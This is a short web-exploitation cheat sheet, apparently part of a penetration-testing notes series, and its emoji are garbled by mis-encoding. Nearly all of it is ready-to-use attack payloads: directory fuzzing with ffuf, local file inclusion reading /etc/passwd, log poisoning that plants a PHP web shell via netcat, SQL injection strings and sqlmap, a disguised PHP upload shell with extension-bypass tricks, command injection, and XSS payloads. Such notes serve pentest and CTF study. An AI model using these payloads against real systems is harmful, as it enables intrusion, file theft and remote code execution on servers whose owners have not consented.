๐ Web Exploitation
This section covers common web vulnerabilities, payloads, and exploitation chains.
โก๏ธ Environment: See 00_environment_setup
๐๏ธ Content Discovery
ffuf -u $URL/FUZZ -w /usr/share/wordlists/dirb/common.txt ๐งพ LFI (Local File Inclusion)
$URL/index.php?page=../../../../etc/passwd
$URL/index.php?page=php://filter/convert.base64-encode/resource=indexLFI โ RCE (Log Poisoning):
echo '<?php system($_GET["cmd"]); ?>' | nc -nv $IP 80
# Then access: $URL/access.log?cmd=id๐งฌ SQL Injection
Manual:
' OR '1'='1
' UNION SELECT null, version()--Automated:
sqlmap -u "$URL/index.php?id=1" --dbs --batch๐ค File Upload Bypass
# shell.php.jpg
GIF89a;
<?php system($_GET['cmd']); ?>Try changing content-type, extensions, double extensions: shell.pHp5, shell.jpg.php
๐ก๏ธ Command Injection
$URL/ping.php?host=127.0.0.1;id๐งผ XSS (Cross Site Scripting)
<script>alert(1)</script>
<img src=x onerror=alert(1)>Next: 03_shells_and_tunnels